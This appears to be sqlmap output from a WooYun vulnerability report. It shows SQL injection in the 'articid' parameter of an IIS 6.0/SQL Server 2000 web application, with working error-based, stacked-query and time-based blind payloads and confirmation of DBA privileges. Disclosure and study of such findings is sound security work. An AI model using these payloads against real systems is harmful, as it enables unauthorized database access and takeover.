WooYun.org

Place: GET
Parameter: articid
    Type: error-based
    Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
    Payload: typeid=108&subid=144&articid=4385' AND 8868=CONVERT(INT,(SELECT CHA
R(113)+CHAR(121)+CHAR(106)+CHAR(107)+CHAR(113)+(SELECT (CASE WHEN (8868=8868) TH
EN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(119)+CHAR(105)+CHAR(114)+CHAR(113
))) AND 'QOyc'='QOyc
    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries
    Payload: typeid=108&subid=144&articid=4385'; WAITFOR DELAY '0:0:5'--
    Type: AND/OR time-based blind
    Title: Microsoft SQL Server/Sybase time-based blind
    Payload: typeid=108&subid=144&articid=4385' WAITFOR DELAY '0:0:5'--
---
[10:53:24] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2003
web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2000
[10:53:24] [INFO] testing if current user is DBA
current user is DBA:    True